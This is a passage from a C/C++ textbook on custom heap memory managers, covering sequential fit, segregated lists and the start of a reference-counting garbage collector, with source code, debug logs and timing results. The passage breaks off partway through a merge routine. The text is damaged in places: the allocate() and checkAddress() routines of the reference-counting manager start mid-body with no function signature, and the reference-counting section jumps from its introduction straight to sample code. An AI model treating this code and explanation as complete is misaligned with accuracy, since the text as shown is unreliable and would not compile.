SequentialFitMemoryManager::merge():merging with both sides
0) [P=0][addr=13][St=FREE][Sz=8][N=34]
1) [P=13][addr=34][St=OCCUPIED][Sz=12][N=59]
2) [P=34][addr=59][St=OCCUPIED][Sz=33][N=105]
3) [P=59][addr=105][St=FREE][Sz=165][N=0]
SequentialFitMemoryManager::release(5439559)
SequentialFitMemoryManager::address resolves to index 59
SequentialFitMemoryManager::merge():merging to NEXT
0) [P=0][addr=13][St=FREE][Sz=8][N=34]
1) [P=13][addr=34][St=OCCUPIED][Sz=12][N=59]
2) [P=34][addr=59][St=FREE][Sz=211][N=0]
SequentialFitMemoryManager::release(5439534)
SequentialFitMemoryManager::address resolves to index 34
SequentialFitMemoryManager::merge():merging with both sides
0) [P=0][addr=13][St=FREE][Sz=257][N=0]
SequentialFitMemoryManager::release(): cannot release NULL
pointer
0) [P=0][addr=13][St=FREE][Sz=257][N=0]
SequentialFitMemoryManager::~SequentialFitMemoryManager()free
ram[270]
Trade-Offs
The sequential fit approach solves many of the problems that
plagued the bitmapped approach by using an indexing scheme that
decreased redundant effort. Instead of manually sifting through each
bit in a bit map, we were able to use a series of pointers to find what
we needed much more quickly.
While the sequential fit technique did exhibit far better perfor-
mance than the bit map technique, we were only using a 270-byte
heap. For much larger heaps, such as a 15MB heap, the amount of
time needed to traverse a sequential linked list from beginning to
end can hurt performance. Thus, the sequential fit method is not
exactly a scalable solution.
In terms of choosing a memory block to allocate, I use what is
known as the first-fit policy, which is to say that my implementation
uses the first satisfactory block of memory that it finds. There are
other policies, like next-fit, best-fit, and worst-fit.
The first-fit policy tends to cause the blocks of memory at the
start of the linked list to splinter into a number of smaller blocks.
Given that the sequential fit algorithm traverses the list starting
from the beginning during an allocation, this can hurt execution
time.
The next-fit policy is like the first-fit policy, but the memory man-
ager keeps track of the position of the last allocation. When the next
allocation request is processed, the manager will start traversing
the linked list from the point of the last allocation. This is done in an
attempt to avoid re-traversing the beginning of the list.
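A minimal sketch of a next-fit search, expressed in terms of the header macros used by my sequential fit manager (the rover variable and the function name are my own additions, not part of the implementation above):
U4 rover = START; /*remembers where the last allocation landed*/
U4 nextFit(U4 nbytes)
{
U4 current = rover;
do
{
if((STATE(current)==FREE)&&(SIZE(current)>=nbytes))
{
rover = current;
return(current); /*index of a suitable block*/
}
current = NEXT(current);
if(current==0){ current = START; } /*wrap around to the front*/
}while(current!=rover);
return(0); /*no block is large enough*/
}
Because the scan resumes at the rover instead of at START, the splintered blocks at the front of the list are not re-examined on every request.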
The best-fit policy traverses the linked list of memory blocks and
uses the smallest possible block that will satisfy an allocation
request. The best-fit approach does not waste memory, but it pays
for this with the extra search time needed to find the smallest
adequate block.
malloc() Version 3: Segregated Lists
Theory
The segregated list approach carves the heap up into a series of
6,136-byte rows, where each row consists of eight different blocks
of memory. This is illustrated in Figure 4.12. The size of the first
element in each row is 16 bytes, and the size of the last element in
each row is 4,096 bytes.
Figure 4.12
Because the list elements are fixed in size, and their positions are
known, we do not need the PREV, NEXT, and SIZE header
fields that were used in the sequential fit scheme. However, we do
need the STATE header field. This causes every plot of real estate
in memory to be prefixed by a header that is a single byte in size.
Each 6,136-byte row of memory contains eight memory blocks
that increase in size (see Figure 4.13). Given that rows are stacked
on top of each other in memory, as displayed in Figure 4.12, to get
to the next element of a specific size, take the index of a given ele-
ment and add 6,136 to it.
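The row size itself falls out of this layout: the eight payloads (16 + 32 + 64 + 128 + 256 + 512 + 1,024 + 4,096 = 6,128 bytes) plus a 1-byte header apiece add up to 6,136 bytes. The index arithmetic can be sketched as follows (the helper names are my own, not part of the manager's source):
U4 columnStart(U4 column) /*column 0..7 holds 16..4,096 byte blocks*/
{
U4 start = 1; /*skip the first 1-byte header*/
U4 size = 16;
U4 i;
for(i=0;i<column;i++)
{
start = start + size + 1; /*previous payload plus the next header*/
size = size*2;
}
return(start);
}
U4 elementIndex(U4 column,U4 row) /*same column, a given row down*/
{
return(columnStart(column)+(row*6136));
}
For example, elementIndex(2,1) yields 51 + 6,136 = 6,187, which is exactly the index reported later in the debug output for the second 64-byte block.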
Figure 4.13
Implementation
The implementation of the segregated memory manager closely
mirrors the implementation of the sequential fit manager:
Table 4.4
File Use
driver.cpp contains main(), is the scene of the crime
mallocV3.cpp newMalloc(), newFree() wrappers (3rd version)
perform.cpp implements the PerformanceTest class
memmgr.cpp implements the SegregatedMemoryManager class
The only files that I had to modify were the mallocV3.cpp file
and the memmgr.cpp file.
memmgr.cpp
The majority of the real work is performed by the class defined in
this file. The SegregatedMemoryManager class takes care of
allocating heap storage from Windows and managing it. The alloca-
tion function uses a helper function to search through the free lists.
The release function does everything by itself.
#ifdef DEBUG_SL_MEM_MGR
#define MSG0(arg); printf(arg);
#define MSG1(arg1,arg2); printf(arg1,arg2);
#else
#define MSG0(arg);
#define MSG1(arg1,arg2);
#endif
/*
list element format
|0| |1 .. n|
[STATE][payload]
U1 ?
*/
/*each column's first payload lies at a fixed offset within row 0;
a 1-byte STATE header precedes every payload*/
#define SZ_ROW 6136
#define START16 1
#define START32 18
#define START64 51
#define START128 116
#define START256 245
#define START512 502
#define START1024 1015
#define START4096 2040
#define STATE(i) (*((U1*)&ram[(i)-1]))
#define FREE 0
#define OCCUPIED 1
char *stateStr[2]={"FREE","OCCUPIED"};
class SegregatedMemoryManager
{
private:
HANDLE handle;
U1 *ram; /*memory storage*/
U4 size; /*# bytes*/
U4 nrows; /*# of 6136 byte rows*/
void initColumn(U4 index);
U4 searchColumn(U4 index);
void printColumn(U4 index);
public:
SegregatedMemoryManager(U4 nbytes);
~SegregatedMemoryManager();
void*allocate(U4 nbytes);
void release(void* addr);
void printState();
};
SegregatedMemoryManager::SegregatedMemoryManager(U4 nbytes)
{
handle = GetProcessHeap();
if(handle==NULL)
{
printf("SegregatedMemoryManager::");
printf("SegregatedMemoryManager():");
printf("invalid handle\n");
exit(1);
}
ram = (U1*)HeapAlloc(handle,HEAP_ZERO_MEMORY,nbytes);
size = nbytes;
if(size<SZ_ROW)
{
printf("SegregatedMemoryManager::");
printf("SegregatedMemoryManager():");
printf("not enough memory fed to constructor\n");
exit(1);
}
nrows = size/SZ_ROW;
initColumn(START16);
initColumn(START32);
initColumn(START64);
initColumn(START128);
initColumn(START256);
initColumn(START512);
initColumn(START1024);
initColumn(START4096);
MSG0("SegregatedMemoryManager::");
MSG1("SegregatedMemoryManager(%lu)\n",nbytes);
return;
}/*end constructor--------------------------------------------*/
/*
set every element in a given size column to FREE
*/
void SegregatedMemoryManager::initColumn(U4 index)
{
U4 i;
for(i=0;i<nrows;i++)
{
STATE(index)=FREE;
index = index + SZ_ROW;
}
return;
}/*end initColumn---------------------------------------------*/
SegregatedMemoryManager::~SegregatedMemoryManager()
{
if(HeapFree(handle,HEAP_NO_SERIALIZE,ram)==0)
{
printf("SegregatedMemoryManager::");
printf("~SegregatedMemoryManager():");
printf("could not free heap storage\n");
return;
}
MSG0("SegregatedMemoryManager::");
MSG0("~SegregatedFitMemoryManager()");
MSG1("free ram[%lu]\n",size);
return;
}/*end destructor---------------------------------------------*/
/*
U4 nbytes - number of bytes required
returns address of first byte of memory region allocated
( or NULL if cannot allocate a large enough block )
*/
void* SegregatedMemoryManager::allocate(U4 nbytes)
{
U4 index;
MSG0("SegregatedMemoryManager::");
MSG1("allocate(%lu)\n",nbytes);
if(nbytes==0)
{
MSG0("SegregatedMemoryManager::");
MSG0("allocate(): zero bytes requested\n");
return(NULL);
}
if(nbytes<=16)
{
index = searchColumn(START16);
if(index){ return((void*)&ram[index]); }
index = searchColumn(START32);
if(index){ return((void*)&ram[index]); }
index = searchColumn(START64);
if(index){ return((void*)&ram[index]); }
index = searchColumn(START128);
if(index){ return((void*)&ram[index]); }
index = searchColumn(START256);
if(index){ return((void*)&ram[index]); }
index = searchColumn(START512);
if(index){ return((void*)&ram[index]); }
index = searchColumn(START1024);
if(index){ return((void*)&ram[index]); }
index = searchColumn(START4096);
if(index){ return((void*)&ram[index]); }
}
else if(nbytes<=32)
{
index = searchColumn(START32);
if(index){ return((void*)&ram[index]); }
index = searchColumn(START64);
if(index){ return((void*)&ram[index]); }
index = searchColumn(START128);
if(index){ return((void*)&ram[index]); }
index = searchColumn(START256);
if(index){ return((void*)&ram[index]); }
index = searchColumn(START512);
if(index){ return((void*)&ram[index]); }
index = searchColumn(START1024);
if(index){ return((void*)&ram[index]); }
index = searchColumn(START4096);
if(index){ return((void*)&ram[index]); }
}
else if(nbytes<=64)
{
index = searchColumn(START64);
if(index){ return((void*)&ram[index]); }
index = searchColumn(START128);
if(index){ return((void*)&ram[index]); }
index = searchColumn(START256);
if(index){ return((void*)&ram[index]); }
index = searchColumn(START512);
if(index){ return((void*)&ram[index]); }
index = searchColumn(START1024);
if(index){ return((void*)&ram[index]); }
index = searchColumn(START4096);
if(index){ return((void*)&ram[index]); }
}
else if(nbytes<=128)
{
index = searchColumn(START128);
if(index){ return((void*)&ram[index]); }
index = searchColumn(START256);
if(index){ return((void*)&ram[index]); }
index = searchColumn(START512);
if(index){ return((void*)&ram[index]); }
index = searchColumn(START1024);
if(index){ return((void*)&ram[index]); }
index = searchColumn(START4096);
if(index){ return((void*)&ram[index]); }
}
else if(nbytes<=256)
{
index = searchColumn(START256);
if(index){ return((void*)&ram[index]); }
index = searchColumn(START512);
if(index){ return((void*)&ram[index]); }
index = searchColumn(START1024);
if(index){ return((void*)&ram[index]); }
index = searchColumn(START4096);
if(index){ return((void*)&ram[index]); }
}
else if(nbytes<=512)
{
index = searchColumn(START512);
if(index){ return((void*)&ram[index]); }
index = searchColumn(START1024);
if(index){ return((void*)&ram[index]); }
index = searchColumn(START4096);
if(index){ return((void*)&ram[index]); }
}
else if(nbytes<=1024)
{
index = searchColumn(START1024);
if(index){ return((void*)&ram[index]); }
index = searchColumn(START4096);
if(index){ return((void*)&ram[index]); }
}
else if(nbytes<=4096)
{
index = searchColumn(START4096);
if(index){ return((void*)&ram[index]); }
}
return(NULL);
}/*end allocation---------------------------------------------*/
/*
search a given size range for a free element
return index
or zero if no available memory
*/
U4 SegregatedMemoryManager::searchColumn(U4 index)
{
U4 i;
for(i=0;i<nrows;i++)
{
if(STATE(index)==FREE)
{
MSG0("SegregatedMemoryManager::");
MSG1("searchColumn(): free at index %lu, ",index);
MSG1("address=%p\n",&ram[index]);
STATE(index)=OCCUPIED;
return(index);
}
index = index + SZ_ROW;
}
return(0);
}/*end searchColumn-------------------------------------------*/
void SegregatedMemoryManager::release(void *addr)
{
U4 free; /*index into ram[]*/
if(addr==NULL)
{
MSG0("SegregatedMemoryManager::");
MSG0("release(): cannot release NULL pointer\n");
return;
}
MSG0("SegregatedMemoryManager::");
MSG1("release(%p)\n",addr);
free = (U4)( ((U1*)addr) - ram ); /*convert the address into a heap index*/
MSG0("SegregatedMemoryManager::");
MSG1("address resolves to index %lu\n",free);
if(free==0)
{
MSG0("SegregatedMemoryManager::");
MSG0("release(): address in first 1st byte\n");
return;
}
if(STATE(free)!=OCCUPIED)
{
MSG0("SegregatedMemoryManager::");
MSG0("release(): referencing invalid region\n");
return;
}
STATE(free)=FREE;
return;
}/*end release------------------------------------------------*/
void SegregatedMemoryManager::printState()
{
printf("[16 bytes]");
printColumn(START16);
printf("[32 bytes]");
printColumn(START32);
printf("[64 bytes]");
printColumn(START64);
printf("[128 bytes]");
printColumn(START128);
printf("[256 bytes]");
printColumn(START256);
printf("[512 bytes]");
printColumn(START512);
printf("[1024 bytes]");
printColumn(START1024);
printf("[4096 bytes]");
printColumn(START4096);
return;
}/*end printState---------------------------------------------*/
/*
print the address of each occupied element in a size column
*/
void SegregatedMemoryManager::printColumn(U4 index)
{
U4 i;
for(i=0;i<nrows;i++)
{
if(STATE(index)==OCCUPIED){ printf("[%p] ",&ram[index]); }
index = index + SZ_ROW;
}
printf("\n");
return;
}/*end printColumn--------------------------------------------*/
mallocV3.cpp
There were several minor alterations to this file, most notably the
presence of a different set of debugging macros. To activate debug-
ging code, uncomment the macros and compile a new build.
#include<stdio.h>
#include<stdlib.h>
#include<windows.h>
//#define DEBUG_SL_MEM_MGR
//#define DEBUG_MALLOCV3
#include<memmgr.cpp>
/*
wrapper functions
*/
SegregatedMemoryManager *mmptr;
void initMemMgr(unsigned long totalbytes)
{
mmptr = new SegregatedMemoryManager(totalbytes);
}
void closeMemMgr()
{
delete(mmptr);
}
void *newMalloc(unsigned long size)
{
void *ptr = (*mmptr).allocate(size);
#ifdef DEBUG_MALLOCV3
(*mmptr).printState();
#endif
return(ptr);
}
void newFree(void *ptr)
{
(*mmptr).release(ptr);
#ifdef DEBUG_MALLOCV3
(*mmptr).printState();
#endif
return;
}
Tests
If you look at the main() function defined in driver.cpp, you
will see that I performed both a debug test and a performance test. I
performed a debug test to make sure the manager was doing what it
was supposed to do. If you modify my source code, I would suggest
running the debug test again to validate your changes. Once I was
sure that the memory manager was operational, I turned off debug-
ging features and ran a performance test.
The debug test is fairly simple, but at the same time, I would
take a good, hard look at what is going on. If you decide to run a
debug test, you will want to make sure that the DEBUG_XXX macros
in mallocV3.cpp are turned on. You will also want to comment
out the PerformanceTestDriver() function call in main().
The following output was generated by the debug build of the
memory manager:
SegregatedMemoryManager::SegregatedMemoryManager(1048576)
SegregatedMemoryManager::allocate(8)
SegregatedMemoryManager::searchColumn(): free at index 1,
address=00B8000D
[16 bytes][00B8000D]
[32 bytes]
[64 bytes]
[128 bytes]
[256 bytes]
[512 bytes]
[1024 bytes]
[4096 bytes]
SegregatedMemoryManager::allocate(12)
SegregatedMemoryManager::searchColumn(): free at index 6137,
address=00B81805
[16 bytes][00B8000D] [00B81805]
[32 bytes]
[64 bytes]
[128 bytes]
[256 bytes]
[512 bytes]
[1024 bytes]
[4096 bytes]
SegregatedMemoryManager::allocate(33)
SegregatedMemoryManager::searchColumn(): free at index 51,
address=00B8003F
[16 bytes][00B8000D] [00B81805]
[32 bytes]
[64 bytes][00B8003F]
[128 bytes]
[256 bytes]
[512 bytes]
[1024 bytes]
[4096 bytes]
SegregatedMemoryManager::allocate(1)
SegregatedMemoryManager::searchColumn(): free at index 12273,
address=00B82FFD
[16 bytes][00B8000D] [00B81805] [00B82FFD]
[32 bytes]
[64 bytes][00B8003F]
[128 bytes]
[256 bytes]
[512 bytes]
[1024 bytes]
[4096 bytes]
SegregatedMemoryManager::allocate(122)
SegregatedMemoryManager::searchColumn(): free at index 116,
address=00B80080
[16 bytes][00B8000D] [00B81805] [00B82FFD]
[32 bytes]
[64 bytes][00B8003F]
[128 bytes][00B80080]
[256 bytes]
[512 bytes]
[1024 bytes]
[4096 bytes]
SegregatedMemoryManager::allocate(50)
SegregatedMemoryManager::searchColumn(): free at index 6187,
address=00B81837
[16 bytes][00B8000D] [00B81805] [00B82FFD]
[32 bytes]
[64 bytes][00B8003F] [00B81837]
[128 bytes][00B80080]
[256 bytes]
[512 bytes]
[1024 bytes]
[4096 bytes]
FREE MEMORY-------------------------------------
SegregatedMemoryManager::release(00B8000D)
SegregatedMemoryManager::address resolves to index 1
[16 bytes][00B81805] [00B82FFD]
[32 bytes]
[64 bytes][00B8003F] [00B81837]
[128 bytes][00B80080]
[256 bytes]
[512 bytes]
[1024 bytes]
[4096 bytes]
SegregatedMemoryManager::release(00B82FFD)
SegregatedMemoryManager::address resolves to index 12273
[16 bytes][00B81805]
[32 bytes]
[64 bytes][00B8003F] [00B81837]
[128 bytes][00B80080]
[256 bytes]
[512 bytes]
[1024 bytes]
[4096 bytes]
SegregatedMemoryManager::release(00B80080)
SegregatedMemoryManager::address resolves to index 116
[16 bytes][00B81805]
[32 bytes]
[64 bytes][00B8003F] [00B81837]
[128 bytes]
[256 bytes]
[512 bytes]
[1024 bytes]
[4096 bytes]
SegregatedMemoryManager::release(00B8003F)
SegregatedMemoryManager::address resolves to index 51
[16 bytes][00B81805]
[32 bytes]
[64 bytes][00B81837]
[128 bytes]
[256 bytes]
[512 bytes]
[1024 bytes]
[4096 bytes]
SegregatedMemoryManager::release(00B81805)
SegregatedMemoryManager::address resolves to index 6137
[16 bytes]
[32 bytes]
[64 bytes][00B81837]
[128 bytes]
[256 bytes]
[512 bytes]
[1024 bytes]
[4096 bytes]
SegregatedMemoryManager::release(00B81837)
SegregatedMemoryManager::address resolves to index 6187
[16 bytes]
[32 bytes]
[64 bytes]
[128 bytes]
[256 bytes]
[512 bytes]
[1024 bytes]
[4096 bytes]
SegregatedMemoryManager::~SegregatedMemoryManager()free
ram[1048576]
Although it may seem a tad tedious, it will help you tremendously to
read the debugTest() function and then step through the previ-
ous output. It will give you an insight into what the code is doing
and how the particulars are implemented.
The performance test was conducted by commenting out
debugTest() and the debug macros in mallocV3.cpp, and
then enabling the PerformanceTestDriver() function. The
results of the performance run were:
PerformanceTest::runTest(): time whistle blown
PerformanceTest::runTest(): race has ended
msecs=5
Trade-Offs
Compared to the sequential fit technique, the segregated list imple-
mentation is blazing fast. However, this does not come without a
cost. The segregated list approach demands a large initial down pay-
ment of memory. The fact that only certain block sizes are provided
can also lead to severe internal fragmentation. For example, a
1,024-byte block could end up being used to service a 32-byte
request.
Another issue resulting from fixed block sizes is that there is a
distinct ceiling placed on the size of the memory region that can be
allocated. In my implementation, you cannot allocate a block larger
than 4,096 bytes. If, for some reason, you need a 4,097-byte block of
memory, you are plain out of luck. There are variations of my segre-
gated list approach, such as the buddy system, that allow certain
forms of splitting and merging to deal with this size-limit problem.
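To give you a taste of how such a variation operates, the following sketch shows the size rounding at the heart of a binary buddy system (a hypothetical illustration; none of the managers in this chapter implement it):
/*round a request up to the nearest power of two; a block of that
size can be split into two half-sized "buddies," and a freed block
can later be merged with its buddy to rebuild the parent block*/
U4 buddyRound(U4 n)
{
U4 p = 1;
while(p<n){ p = p*2; }
return(p); /*e.g., a 4,097-byte request rounds up to 8,192*/
}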
Performance Comparison
Let us revisit all three of the previous implementations. In each of
the performance tests, the resident memory manager was given
1MB of storage and was asked to service 1,024 consecutive mem-
ory allocation/release operations. The score card is provided in
Table 4.5.
Table 4.5
Manager Milliseconds
bitmapped 856
sequential fit 35
segregated list 5
Automatic Memory
Management
Automatic memory managers keep track of the memory that is allo-
cated from the heap so that the programmer is absolved of the
responsibility. This makes life easier for the programmer. In fact,
not only does it make the programmer’s job easier, but it also elimi-
nates other nasty problems, like memory leaks and dangling
pointers. The downside is that automatic memory managers are
much more difficult to build because they must incorporate all the
extra bookkeeping functionality.
Figure 5.1
void main()
{
char *cptr1;
char *cptr2;
char *cptr3;
cptr1 = (char*)malloc(16); //increment count of block #1
cptr2 = (char*)malloc(16); //increment count of block #2
cptr3 = cptr1;             //increment count of block #1
cptr2 = cptr3;             //decrement block #2, increment block #1
return;                    //decrement the counts of all referenced blocks
}
Each reference increment and decrement has been marked with a
comment to give you an idea of what would need to be done behind
the scenes. The one line:
cptr2 = cptr3;
actually requires the memory manager to decrement the count of the
block that cptr2 currently references and then increment the count
of the block that cptr3 references.
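In other words, a compiler that supported reference counting would conceptually expand that assignment into something like the following (the rc_dec() and rc_inc() helper names are hypothetical):
rc_dec(cptr2); /*the block cptr2 used to reference loses a reference*/
cptr2 = cptr3;
rc_inc(cptr2); /*the block cptr3 references gains a reference*/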
Implementation
I decided to implement a reference counting garbage collector by
modifying the sequential fit implementation in Chapter 4. As with
the sequential fit approach, memory is arranged as a series of blocks
where each block is prefixed by a 16-byte header (see Figure 5.2).
Figure 5.2
The STATE field, which was a byte in the sequential fit implementa-
tion, has been replaced by a 32-bit field called COUNT. This COUNT
field keeps track of the number of references to a block of memory.
My implementation of the reference counting memory manager
required four files:
Table 5.1
File Use
driver.cpp contains main(), is the scene of the crime
mallocV4.cpp newMalloc(), newFree() wrappers (4th version)
perform.cpp implements the PerformanceTest class
memmgr.cpp implements the RefCountMemoryManager class
driver.cpp
This file contains the main() entry point. You can build my imple-
mentation to execute a diagnostic test or a performance test. To
build the diagnostic version, you will need to comment out the
PerformanceTestDriver() invocation and uncomment the
debugTest() invocation. You will also need to activate the
DEBUG_XXX macros in the mallocV4.cpp file.
Because the compiler that I used has not been engineered to
emit the extra instructions needed to support reference counting, I
had to manually insert the code. Throughout debugTest(), I
added inc() and dec() function calls. I also added comments
indicating that these calls should have been generated by the
compiler.
#include<mallocV4.cpp>
#include<perform.cpp>
/*
not using a modified compiler, so will need to insert
the inc() and dec() calls manually
*/
void debugTest()
{
void *ptr[6];
void *ptr1;
void *ptr2;
void *ptr3;
int i;
unsigned long allocs[6]={8,12,33,1,122,50};
initMemMgr(270);
for(i=0;i<6;i++)
{
ptr[i] = newMalloc(allocs[i]);
if(ptr[i]==NULL){ printf("ptr[%lu]==NULL!\n",i); }
}
//copying addresses
printf("copying ptr[0]\n");
ptr1 = ptr[0];
(*mmptr).inc(ptr[0]); //compiler insert
printf("copying ptr[1]\n");
ptr3 = ptr[1];
(*mmptr).inc(ptr[1]); //compiler insert
printf("copying ptr1\n");
ptr2 = ptr1;
(*mmptr).inc(ptr1); //compiler insert
//overwriting
printf("overwriting ptr2 with ptr3\n");
(*mmptr).dec(ptr2); //compiler insert
ptr2 = ptr3;
(*mmptr).inc(ptr2); //compiler insert
printf("leaving scope\n");
for(i=0;i<6;i++)
{
(*mmptr).dec(ptr[i]); //compiler insert
}
(*mmptr).dec(ptr1); //compiler insert
(*mmptr).dec(ptr2); //compiler insert
(*mmptr).dec(ptr3); //compiler insert
closeMemMgr();
return;
}/*end debugTest----------------------------------------------*/
void main()
{
//for the debug test, should activate debug macros in mallocVx.cpp
//debugTest();
PerformanceTestDriver();
return;
}/*end main---------------------------------------------------*/
mallocV4.cpp
Because we are now in the domain of automatic memory manage-
ment, I disabled the newFree() function that has traditionally
been defined in this file. The newMalloc() function is still opera-
tional, albeit using a different underlying object. If you wish to
perform a debug/diagnostic test, you will need to activate the
DEBUG_XXX macros.
#include<stdio.h>
#include<stdlib.h>
#include<windows.h>
//#define DEBUG_RC_MEM_MGR
//#define DEBUG_MALLOCV4
#include<memmgr.cpp>
/*
wrapper functions
*/
RefCountMemoryManager *mmptr;
void initMemMgr(unsigned long totalbytes)
{
mmptr = new RefCountMemoryManager(totalbytes);
}
void closeMemMgr()
{
delete(mmptr);
}
void *newMalloc(unsigned long size)
{
void *ptr = (*mmptr).allocate(size);
#ifdef DEBUG_MALLOCV4
(*mmptr).printState();
#endif
return(ptr);
}
perform.cpp
The PerformanceTest class defined in this file has not been
modified very much. The only thing that changed was the imple-
mentation of the runTest() member function. Specifically, I had
to remove the calls to newFree(), which are no longer valid, and
add in the dec() invocations that the compiler should normally
emit.
unsigned long PerformanceTest::runTest()
{
unsigned long *allocs;
unsigned long i;
unsigned long ticks1,ticks2;
char **addr; /*holds the pointers returned by newMalloc()*/
getAllocArray(allocs);
addr = (char**)malloc(sizeof(char*)*nAllocations);
initMemMgr(1024*1024);
ticks1 = GetTickCount();
for(i=0;i<nAllocations;i++)
{
//printf("%lu\n",allocs[i]);
addr[i] = (char *)newMalloc(allocs[i]);
if(addr[i]==NULL)
{
printf("mallco()=addr[%lu]=%lu failed\n",i,addr[i]);
exit(1);
}
}
/*the dec() calls that a reference counting compiler would emit*/
for(i=0;i<nAllocations;i++)
{
(*mmptr).dec(addr[i]);
}
ticks2 = GetTickCount();
closeMemMgr();
free(addr);
free(allocs);
return(ticks2-ticks1);
}/*end runTest------------------------------------------------*/
memmgr.cpp
The RefCountMemoryManager class defined in this file is
basically an extended version of the SequentialFitMemoryManager.
To give you an idea of how this class operates, I have enumerated
the possible paths of execution for this class in Figure 5.3.
Figure 5.3
#ifdef DEBUG_RC_MEM_MGR
#define MSG0(arg); printf(arg);
#define MSG1(arg1,arg2); printf(arg1,arg2);
#else
#define MSG0(arg);
#define MSG1(arg1,arg2);
#endif
/*
list element format
|0 3||4 7||8 11||12 15||16 .. n|
[PREV][NEXT][COUNT][ SIZE ][payload]
U4 U4 U4 U4 ?
*/
/*header fields occupy the 16 bytes that precede each block's payload*/
#define SZ_HEADER 16
#define START SZ_HEADER
#define PREV(i) (*((U4*)&ram[(i)-16]))
#define NEXT(i) (*((U4*)&ram[(i)-12]))
#define COUNT(i) (*((U4*)&ram[(i)-8]))
#define SIZE(i) (*((U4*)&ram[(i)-4]))
#define FREE 0
class RefCountMemoryManager
{
private:
HANDLE handle;
U1 *ram; /*memory storage*/
U4 size;
void split(U4 addr,U4 nbytes);
int checkAddress(void *addr);
int checkIndex(U4 free);
void release(U4 free);
void merge(U4 prev,U4 current,U4 next);
public:
RefCountMemoryManager(U4 nbytes);
~RefCountMemoryManager();
void*allocate(U4 nbytes);
void inc(void *addr);
void dec(void *addr);
void printState();
};
RefCountMemoryManager::RefCountMemoryManager(U4 nbytes)
{
handle = GetProcessHeap();
if(handle==NULL)
{
printf("RefCountMemoryManager::");
printf("RefCountMemoryManager():");
printf("invalid handle\n");
exit(1);
}
ram = (U1*)HeapAlloc(handle,HEAP_ZERO_MEMORY,nbytes);
size = nbytes;
if(size<=SZ_HEADER)
{
printf("RefCountMemoryManager::");
printf("RefCountMemoryManager():");
printf("not enough memory fed to constructor\n");
exit(1);
}
PREV(START)=0;
NEXT(START)=0;
COUNT(START)=0;
SIZE(START)=size-SZ_HEADER;
MSG0("RefCountMemoryManager::");
MSG1("RefCountMemoryManager(%lu)\n",nbytes);
return;
}/*end constructor--------------------------------------------*/
RefCountMemoryManager::~RefCountMemoryManager()
{
if(HeapFree(handle,HEAP_NO_SERIALIZE,ram)==0)
{
printf("RefCountMemoryManager::");
printf("~RefCountMemoryManager():");
printf("could not free heap storage\n");
return;
}
MSG0("RefCountMemoryManager::");
MSG0("~RefCountMemoryManager()");
MSG1("free ram[%lu]\n",size);
return;
}/*end destructor---------------------------------------------*/
/*
U4 nbytes - number of bytes required
returns address of first byte of memory region allocated
( or NULL if cannot allocate a large enough block )
*/
MSG0("RefCountMemoryManager::");
MSG1("allocate(%lu)\n",nbytes);
if(nbytes==0)
{
MSG0("RefCountMemoryManager::");
MSG0("allocate(): zero bytes requested\n");
return(NULL);
}
current = START;
while(NEXT(current)!=0)
{
if((SIZE(current)>=nbytes)&&(COUNT(current)==FREE))
{
split(current,nbytes);
return((void*)&ram[current]);
}
current = NEXT(current);
}
if((SIZE(current)>=nbytes)&&(COUNT(current)==FREE))
{
split(current,nbytes);
return((void*)&ram[current]);
}
return(NULL);
}/*end allocation---------------------------------------------*/
/*
breaks [free] region into [alloc][free] pair, if possible
*/
void RefCountMemoryManager::split(U4 addr,U4 nbytes)
{
if(SIZE(addr)>=nbytes+SZ_HEADER+SZ_HEADER)
{
U4 oldnext;
U4 oldprev;
U4 oldsize;
U4 newaddr;
MSG0("RefCountMemoryManager::");
MSG0("split(): split=YES\n");
oldnext=NEXT(addr);
oldprev=PREV(addr);
oldsize=SIZE(addr);
newaddr = addr+nbytes+SZ_HEADER; /*first byte of the new free block's payload*/
NEXT(addr)=newaddr;
PREV(addr)=oldprev;
COUNT(addr)=1;
SIZE(addr)=nbytes;
NEXT(newaddr)=oldnext;
PREV(newaddr)=addr;
COUNT(newaddr)=FREE;
SIZE(newaddr)=oldsize-nbytes-SZ_HEADER;
}
else
{
MSG0("RefCountMemoryManager::");
MSG0("split(): split=NO\n");
COUNT(addr)=1;
}
return;
}/*end split--------------------------------------------------*/
MSG0("RefCountMemoryManager::");
MSG1("checkAddress(%lu)\n",addr);
return(TRUE);
}/*end checkAddress-------------------------------------------*/
int RefCountMemoryManager::checkIndex(U4 free)
{
if(free<SZ_HEADER)
{
MSG0("RefCountMemoryManager::");
MSG0("checkIndex(): address in first 16 bytes\n");
return(FALSE);
}
return(TRUE);
}/*end checkIndex---------------------------------------------*/
void RefCountMemoryManager::inc(void *addr)
{
U4 free; /*index into ram[]*/
if(checkAddress(addr)==FALSE){ return; }
free = (U4)( ((U1*)addr) - ram );
MSG0("RefCountMemoryManager::");
MSG1("inc(): address resolves to index %lu\n",free);
if(checkIndex(free)==FALSE){ return; }
COUNT(free) = COUNT(free)+1;
MSG0("RefCountMemoryManager::");
MSG1("inc(): incrementing ram[%lu] ",free);
MSG1("to %lu\n",COUNT(free));
return;
}/*end inc----------------------------------------------------*/
void RefCountMemoryManager::dec(void *addr)
{
U4 free; /*index into ram[]*/
if(checkAddress(addr)==FALSE){ return; }
free = (U4)( ((U1*)addr) - ram );
MSG0("RefCountMemoryManager::");
MSG1("dec(): address resolves to index %lu\n",free);
if(checkIndex(free)==FALSE){ return; }
COUNT(free) = COUNT(free)-1;
MSG0("RefCountMemoryManager::");
MSG1("dec(): decrementing ram[%lu] ",free);
MSG1("to %lu\n",COUNT(free));
if(COUNT(free)==FREE)
{
MSG0("RefCountMemoryManager::");
MSG1("dec(): releasing ram[%lu]\n",free);
release(free);
}
return;
}/*end dec----------------------------------------------------*/
void RefCountMemoryManager::release(U4 free)
{
merge(PREV(free),free,NEXT(free));
#ifdef DEBUG_RC_MEM_MGR
printState();
#endif
return;
}/*end release------------------------------------------------*/
/*
4 cases ( F=free O=occupied )
FOF -> [F]
OOF -> O[F]
FOO -> [F]O
OOO -> OFO
*/
void RefCountMemoryManager::merge(U4 prev,U4 current,U4 next)
{
if(prev==0)
{
if(next==0)
{
COUNT(current)=FREE;
}
else if(COUNT(next)!=FREE)
{
COUNT(current)=FREE;
}
else if(COUNT(next)==FREE)
{
U4 temp;
MSG0("RefCountMemoryManager::merge():");
MSG0("merging to NEXT\n");
COUNT(current)=FREE;
SIZE(current)=SIZE(current)+SIZE(next)+SZ_HEADER;
NEXT(current)=NEXT(next);
temp = NEXT(next);
if(temp!=0){ PREV(temp)=current; }
}
}
else if(next==0)
{
if(COUNT(prev)!=FREE)
{
COUNT(current)=FREE;
}
else if(COUNT(prev)==FREE)
{
MSG0("RefCountMemoryManager::merge():");
MSG0("merging to PREV\n");
